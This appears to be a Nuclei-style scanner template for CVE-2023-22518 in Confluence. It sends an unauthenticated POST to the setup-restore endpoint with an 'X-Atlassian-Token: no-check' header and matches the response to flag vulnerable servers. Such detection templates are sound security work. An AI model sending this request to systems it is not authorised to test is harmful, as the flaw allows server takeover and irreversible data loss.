id: CVE-2023-22518
info:
  name: Confluence Restore RCE
  author: Chaitin
  severity: high
  description: |
    An attacker who successfully exploits this vulnerability can bypass authentication to some extent and then control and take over the server through concatenated background interfaces without authentication. It should be noted that this exploit can lead to Confluence data emptying, which has an irreversible impact on application data integrity.
  reference: https://mp.weixin.qq.com/s/Yh92tfQRgKXP0_K4foWcfw

http:
  - method: POST
    path:
      - "{{BaseURL}}/json/setup-restore.action"
    headers:
      X-Atlassian-Token: no-check
      Content-Type: multipart/form-data; boundary=----{{randstr}}
    matchers-condition: or
    matchers:
      - type: word
        words:
          - "buildIndexLocalFileRestore"
          - "setup-restore-local.action"
        part: body